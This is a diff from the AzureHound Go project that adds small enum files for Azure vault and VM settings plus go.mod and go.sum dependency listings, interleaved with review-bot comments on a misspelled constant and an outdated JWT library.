+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// SKU name to specify whether the key vault is a standard vault or a premium vault.
+type VaultSku string
+
+const (
+ VaultSkuPremium VaultSku = "premium"
+ VaultSkuStandard VaultSku = "standard"
+)
diff --git a/enums/vmdeleteoption.go b/enums/vmdeleteoption.go
new file mode 100644
index 0000000..0297df2
--- /dev/null
+++ b/enums/vmdeleteoption.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type VMDeleteOption string
+
+const (
+ VMDeleteOptionDelete VMDeleteOption = "Delete"
+ VMDeleteOptionDetatch VMDeleteOption = "Detatch"
+)
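Review bot: `VMDeleteOptionDetatch` and its wire value `"Detatch"` in enums/vmdeleteoption.go look misspelled. As far as I know the Azure compute API spells this delete option `Detach`, so a comparison between a value decoded from the service and this constant would never match, and any logic keyed on it would silently fall through. I would change the line to `VMDeleteOptionDetach VMDeleteOption = "Detach"`; whether other files in the patch already reference the misspelled name is not visible from this hunk.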
diff --git a/enums/vmevictionpolicy.go b/enums/vmevictionpolicy.go
new file mode 100644
index 0000000..72f4d4e
--- /dev/null
+++ b/enums/vmevictionpolicy.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type VMEvictionPolicy string
+
+const (
+ VMEvictionPolicyDeallocate VMEvictionPolicy = "Deallocate"
+ VMEvictionPolicyDelete VMEvictionPolicy = "Delete"
+)
diff --git a/enums/vmpriority.go b/enums/vmpriority.go
new file mode 100644
index 0000000..9454367
--- /dev/null
+++ b/enums/vmpriority.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type VMPriority string
+
+const (
+ VMPriorityLow VMPriority = "Low"
+ VMPriorityRegular VMPriority = "Regular"
+ VMPrioritySpot VMPriority = "Spot"
+)
diff --git a/go.mod b/go.mod
new file mode 100644
index 0000000..7ac6e40
--- /dev/null
+++ b/go.mod
@@ -0,0 +1,43 @@
+module github.com/bloodhoundad/azurehound/v2
+
+go 1.20
+
+require (
+ github.com/go-logr/logr v1.2.0
+ github.com/gofrs/uuid v4.1.0+incompatible
+ github.com/golang-jwt/jwt v3.2.2+incompatible
+ github.com/judwhite/go-svc v1.2.1
+ github.com/manifoldco/promptui v0.9.0
+ github.com/rs/zerolog v1.26.0
+ github.com/spf13/cobra v1.8.1
+ github.com/spf13/pflag v1.0.5
+ github.com/spf13/viper v1.10.1
+ github.com/stretchr/testify v1.7.0
+ github.com/youmark/pkcs8 v0.0.0-20201027041543-1326539a0a0a
+ go.uber.org/mock v0.2.0
+ golang.org/x/net v0.23.0
+ golang.org/x/sys v0.18.0
+)
+
+require (
+ github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e // indirect
+ github.com/davecgh/go-spew v1.1.1 // indirect
+ github.com/fsnotify/fsnotify v1.5.1 // indirect
+ github.com/hashicorp/hcl v1.0.0 // indirect
+ github.com/inconshreveable/mousetrap v1.1.0 // indirect
+ github.com/magiconair/properties v1.8.5 // indirect
+ github.com/mitchellh/mapstructure v1.4.3 // indirect
+ github.com/pelletier/go-toml v1.9.4 // indirect
+ github.com/pmezard/go-difflib v1.0.0 // indirect
+ github.com/spf13/afero v1.6.0 // indirect
+ github.com/spf13/cast v1.4.1 // indirect
+ github.com/spf13/jwalterweatherman v1.1.0 // indirect
+ github.com/subosito/gotenv v1.2.0 // indirect
+ golang.org/x/crypto v0.21.0 // indirect
+ golang.org/x/mod v0.8.0 // indirect
+ golang.org/x/text v0.14.0 // indirect
+ golang.org/x/tools v0.6.0 // indirect
+ gopkg.in/ini.v1 v1.66.2 // indirect
+ gopkg.in/yaml.v2 v2.4.0 // indirect
+ gopkg.in/yaml.v3 v3.0.1 // indirect
+)
diff --git a/go.sum b/go.sum
new file mode 100644
index 0000000..caf00fb
--- /dev/null
+++ b/go.sum
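Review bot: The first `require` block pins `github.com/golang-jwt/jwt v3.2.2+incompatible`, the legacy pre-module v3 line; upstream development continues under `github.com/golang-jwt/jwt/v4` and `/v5`, so fixes to token parsing and validation will not arrive on this import path. How the library is used is not visible in this hunk, but for a tool that handles cloud access tokens I would move to a maintained major, e.g. `github.com/golang-jwt/jwt/v5`. The `go 1.20` directive and the `golang.org/x/net`, `golang.org/x/crypto` and `golang.org/x/sys` pins are likewise frozen at whatever was current when the file was written. Adding a `govulncheck ./...` step to the build workflow would report known-vulnerable versions that the code actually reaches and keep these pins from drifting unnoticed.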
@@ -0,0 +1,827 @@ +cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU= +cloud.google.com/go v0.44.1/go.mod h1:iSa0KzasP4Uvy3f1mN/7PiObzGgflwredwwASm/v6AU= +cloud.google.com/go v0.44.2/go.mod h1:60680Gw3Yr4ikxnPRS/oxxkBccT6SA1yMk63TGekxKY= +cloud.google.com/go v0.45.1/go.mod h1:RpBamKRgapWJb87xiFSdk4g1CME7QZg3uwTez+TSTjc= +cloud.google.com/go v0.46.3/go.mod h1:a6bKKbmY7er1mI7TEI4lsAkts/mkhTSZK8w33B4RAg0= +cloud.google.com/go v0.50.0/go.mod h1:r9sluTvynVuxRIOHXQEHMFffphuXHOMZMycpNR5e6To= +cloud.google.com/go v0.52.0/go.mod h1:pXajvRH/6o3+F9jDHZWQ5PbGhn+o8w9qiu/CffaVdO4= +cloud.google.com/go v0.53.0/go.mod h1:fp/UouUEsRkN6ryDKNW/Upv/JBKnv6WDthjR6+vze6M= +cloud.google.com/go v0.54.0/go.mod h1:1rq2OEkV3YMf6n/9ZvGWI3GWw0VoqH/1x2nd8Is/bPc= +cloud.google.com/go v0.56.0/go.mod h1:jr7tqZxxKOVYizybht9+26Z/gUq7tiRzu+ACVAMbKVk= +cloud.google.com/go v0.57.0/go.mod h1:oXiQ6Rzq3RAkkY7N6t3TcE6jE+CIBBbA36lwQ1JyzZs= +cloud.google.com/go v0.62.0/go.mod h1:jmCYTdRCQuc1PHIIJ/maLInMho30T/Y0M4hTdTShOYc= +cloud.google.com/go v0.65.0/go.mod h1:O5N8zS7uWy9vkA9vayVHs65eM1ubvY4h553ofrNHObY= +cloud.google.com/go v0.72.0/go.mod h1:M+5Vjvlc2wnp6tjzE102Dw08nGShTscUx2nZMufOKPI= +cloud.google.com/go v0.74.0/go.mod h1:VV1xSbzvo+9QJOxLDaJfTjx5e+MePCpCWwvftOeQmWk= +cloud.google.com/go v0.78.0/go.mod h1:QjdrLG0uq+YwhjoVOLsS1t7TW8fs36kLs4XO5R5ECHg= +cloud.google.com/go v0.79.0/go.mod h1:3bzgcEeQlzbuEAYu4mrWhKqWjmpprinYgKJLgKHnbb8= +cloud.google.com/go v0.81.0/go.mod h1:mk/AM35KwGk/Nm2YSeZbxXdrNK3KZOYHmLkOqC2V6E0= +cloud.google.com/go v0.83.0/go.mod h1:Z7MJUsANfY0pYPdw0lbnivPx4/vhy/e2FEkSkF7vAVY= +cloud.google.com/go v0.84.0/go.mod h1:RazrYuxIK6Kb7YrzzhPoLmCVzl7Sup4NrbKPg8KHSUM= +cloud.google.com/go v0.87.0/go.mod h1:TpDYlFy7vuLzZMMZ+B6iRiELaY7z/gJPaqbMx6mlWcY= +cloud.google.com/go v0.90.0/go.mod 
h1:kRX0mNRHe0e2rC6oNakvwQqzyDmg57xJ+SZU1eT2aDQ= +cloud.google.com/go v0.93.3/go.mod h1:8utlLll2EF5XMAV15woO4lSbWQlk8rer9aLOfLh7+YI= +cloud.google.com/go v0.94.1/go.mod h1:qAlAugsXlC+JWO+Bke5vCtc9ONxjQT3drlTTnAplMW4= +cloud.google.com/go v0.97.0/go.mod h1:GF7l59pYBVlXQIBLx3a761cZ41F9bBH3JUlihCt2Udc= +cloud.google.com/go v0.98.0/go.mod h1:ua6Ush4NALrHk5QXDWnjvZHN93OuF0HfuEPq9I1X0cM= +cloud.google.com/go v0.99.0/go.mod h1:w0Xx2nLzqWJPuozYQX+hFfCSI8WioryfRDzkoI/Y2ZA= +cloud.google.com/go/bigquery v1.0.1/go.mod h1:i/xbL2UlR5RvWAURpBYZTtm/cXjCha9lbfbpx4poX+o= +cloud.google.com/go/bigquery v1.3.0/go.mod h1:PjpwJnslEMmckchkHFfq+HTD2DmtT67aNFKH1/VBDHE= +cloud.google.com/go/bigquery v1.4.0/go.mod h1:S8dzgnTigyfTmLBfrtrhyYhwRxG72rYxvftPBK2Dvzc= +cloud.google.com/go/bigquery v1.5.0/go.mod h1:snEHRnqQbz117VIFhE8bmtwIDY80NLUZUMb4Nv6dBIg= +cloud.google.com/go/bigquery v1.7.0/go.mod h1://okPTzCYNXSlb24MZs83e2Do+h+VXtc4gLoIoXIAPc= +cloud.google.com/go/bigquery v1.8.0/go.mod h1:J5hqkt3O0uAFnINi6JXValWIb1v0goeZM77hZzJN/fQ= +cloud.google.com/go/datastore v1.0.0/go.mod h1:LXYbyblFSglQ5pkeyhO+Qmw7ukd3C+pD7TKLgZqpHYE= +cloud.google.com/go/datastore v1.1.0/go.mod h1:umbIZjpQpHh4hmRpGhH4tLFup+FVzqBi1b3c64qFpCk= +cloud.google.com/go/firestore v1.6.1/go.mod h1:asNXNOzBdyVQmEU+ggO8UPodTkEVFW5Qx+rwHnAz+EY= +cloud.google.com/go/pubsub v1.0.1/go.mod h1:R0Gpsv3s54REJCy4fxDixWD93lHJMoZTyQ2kNxGRt3I= +cloud.google.com/go/pubsub v1.1.0/go.mod h1:EwwdRX2sKPjnvnqCa270oGRyludottCI76h+R3AArQw= +cloud.google.com/go/pubsub v1.2.0/go.mod h1:jhfEVHT8odbXTkndysNHCcx0awwzvfOlguIAii9o8iA= +cloud.google.com/go/pubsub v1.3.1/go.mod h1:i+ucay31+CNRpDW4Lu78I4xXG+O1r/MAHgjpRVR+TSU= +cloud.google.com/go/storage v1.0.0/go.mod h1:IhtSnM/ZTZV8YYJWCY8RULGVqBDmpoyjwiyrjsg+URw= +cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0ZeosJ0Rtdos= +cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= +cloud.google.com/go/storage v1.8.0/go.mod 
h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= +cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= +dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= +github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= +github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= +github.com/DataDog/datadog-go v3.2.0+incompatible/go.mod h1:LButxg5PwREeZtORoXG3tL4fMGNddJ+vMq1mwgfaqoQ= +github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU= +github.com/alecthomas/template v0.0.0-20160405071501-a0175ee3bccc/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc= +github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc= +github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= +github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= +github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= +github.com/armon/circbuf v0.0.0-20150827004946-bbbad097214e/go.mod h1:3U/XgcO3hCbHZ8TKRvWD2dDTCfh9M9ya+I9JpbB7O8o= +github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da/go.mod h1:Q73ZrmVTwzkszR9V5SSuryQ31EELlFMUz1kKyl939pY= +github.com/armon/go-metrics v0.3.10/go.mod h1:4O98XIr/9W0sxpJ8UaYkvjk10Iff7SnFrb4QAOwNTFc= +github.com/armon/go-radix v0.0.0-20180808171621-7fddfc383310/go.mod h1:ufUuZ+zHj4x4TnLV4JWEpy2hxWSpsRywHrMgIH9cCH8= +github.com/armon/go-radix v1.0.0/go.mod h1:ufUuZ+zHj4x4TnLV4JWEpy2hxWSpsRywHrMgIH9cCH8= +github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= +github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8= +github.com/beorn7/perks 
v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw= +github.com/bgentry/speakeasy v0.1.0/go.mod h1:+zsyZBPWlz7T6j88CTgSN5bM796AkVf0kBD4zp0CCIs= +github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= +github.com/census-instrumentation/opencensus-proto v0.3.0/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= +github.com/cespare/xxhash v1.1.0/go.mod h1:XrSqR1VqqWfGrhpAt58auRo0WTKS1nRRg3ghfAqPWnc= +github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= +github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= +github.com/chzyer/logex v1.1.10 h1:Swpa1K6QvQznwJRcfTfQJmTE72DqScAa40E+fbHEXEE= +github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI= +github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e h1:fY5BOSpyZCqRo5OhCuC+XN+r/bBCmeuuJtjz+bCNIf8= +github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e/go.mod h1:nSuG5e5PlCu98SY8svDHJxuZscDgtXS6KTTbou5AhLI= +github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1 h1:q763qf9huN11kDQavWsoZXJNW3xEE4JJyHa5Q25/sd8= +github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1/go.mod h1:Q3SI9o4m/ZMnBNeIyt5eFwwo7qiLfzFZmjNmxjkiQlU= +github.com/circonus-labs/circonus-gometrics v2.3.1+incompatible/go.mod h1:nmEj6Dob7S7YxXgwXpfOuvO54S+tGdZdw9fuRZt25Ag= +github.com/circonus-labs/circonusllhist v0.1.3/go.mod h1:kMXHVDlOchFAehlya5ePtbp5jckzBHf4XRpQvBOLI+I= +github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= +github.com/cncf/udpa/go v0.0.0-20200629203442-efcf912fb354/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/udpa/go v0.0.0-20210930031921-04548b0d99d4/go.mod 
h1:6pvJx4me5XPnfI9Z40ddWsdw2W/uZgQLFXToKeRcDiI= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20210805033703-aa0b78936158/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20210922020428-25de7278fc84/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211001041855-01bcc9b48dfe/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211011173535-cb28da3451f1/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211130200136-a8f946100490/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/coreos/go-semver v0.3.0/go.mod h1:nnelYz7RCh+5ahJtPPxZlU+153eP4D4r3EedlOD2RNk= +github.com/coreos/go-systemd/v22 v22.3.2/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc= +github.com/cpuguy83/go-md2man/v2 v2.0.1/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= +github.com/cpuguy83/go-md2man/v2 v2.0.4/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= +github.com/envoyproxy/go-control-plane v0.9.7/go.mod h1:cwu0lG7PUMfa9snN8LXBig5ynNVH9qI8YYLbd1fK2po= +github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane 
v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= +github.com/envoyproxy/go-control-plane v0.9.10-0.20210907150352-cf90f659a021/go.mod h1:AFq3mo9L8Lqqiid3OhADV3RfLJnjiw63cSpi+fDTRC0= +github.com/envoyproxy/go-control-plane v0.10.1/go.mod h1:AY7fTTXNdv/aJ2O5jwpxAPOWUZ7hQAEvzN5Pf27BkQQ= +github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= +github.com/envoyproxy/protoc-gen-validate v0.6.2/go.mod h1:2t7qjJNvHPx8IjnBOzl9E9/baC+qXE/TeeyBRzgJDws= +github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= +github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU= +github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= +github.com/fsnotify/fsnotify v1.5.1 h1:mZcQUHVQUQWoPXXtuf9yuEXKudkV2sx1E06UadKWpgI= +github.com/fsnotify/fsnotify v1.5.1/go.mod h1:T3375wBYaZdLLcVNkcVbzGHY7f1l/uK5T5Ai1i3InKU= +github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= +github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= +github.com/go-gl/glfw/v3.3/glfw v0.0.0-20191125211704-12ad95a8df72/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= +github.com/go-gl/glfw/v3.3/glfw v0.0.0-20200222043503-6f7a984d4dc4/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= +github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as= +github.com/go-kit/kit v0.9.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as= +github.com/go-logfmt/logfmt v0.3.0/go.mod h1:Qt1PoO58o5twSAckw1HlFXLmHsOX5/0LbT9GBnD5lWE= +github.com/go-logfmt/logfmt v0.4.0/go.mod h1:3RMwSq7FuexP4Kalkev3ejPJsZTpXXBr9+V4qmtdjCk= +github.com/go-logr/logr v1.2.0 h1:QK40JKJyMdUDz+h+xvCsru/bJhvG0UxvePV0ufL/AcE= 
+github.com/go-logr/logr v1.2.0/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= +github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY= +github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= +github.com/gofrs/uuid v4.1.0+incompatible h1:sIa2eCvUTwgjbqXrPLfNwUf9S3i3mpH1O1atV+iL/Wk= +github.com/gofrs/uuid v4.1.0+incompatible/go.mod h1:b2aQJv3Z4Fp6yNu3cdSllBxTCLRxnplIgP/c0N/04lM= +github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ= +github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= +github.com/golang-jwt/jwt v3.2.2+incompatible h1:IfV12K8xAKAnZqdXVzCZ+TOjboZ2keLg81eXfW3O+oY= +github.com/golang-jwt/jwt v3.2.2+incompatible/go.mod h1:8pz2t5EyA70fFQQSrl6XZXzqecmYZeUEB8OUGHkxJ+I= +github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20191227052852-215e87163ea7/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/mock v1.2.0/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/mock v1.3.1/go.mod h1:sBzyDLLjw3U8JLTeZvSv8jJB+tU5PVekmnlKIyFUx0Y= +github.com/golang/mock v1.4.0/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw= +github.com/golang/mock v1.4.1/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw= +github.com/golang/mock v1.4.3/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw= +github.com/golang/mock v1.4.4/go.mod 
h1:l3mdAwkq5BuhzHwde/uurv3sEJeZMXNpwsxVWU71h+4= +github.com/golang/mock v1.5.0/go.mod h1:CWnOUgYIOo4TcNZ0wHX3YZCqsaM1I1Jvs6v3mP3KVu8= +github.com/golang/mock v1.6.0/go.mod h1:p6yTPP+5HYm5mzsMV8JkE6ZKdX+/wYM6Hr+LicevLPs= +github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= +github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= +github.com/golang/protobuf v1.3.5/go.mod h1:6O5/vntMXwX2lRkT1hjjk0nAC1IDOTvTlVgjlRvqsdk= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= +github.com/golang/protobuf v1.5.1/go.mod h1:DopwsBzvsk0Fs44TXzsVbJyPhcCPeIwnvohx4u74HPM= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= +github.com/golang/snappy v0.0.3/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= +github.com/google/btree 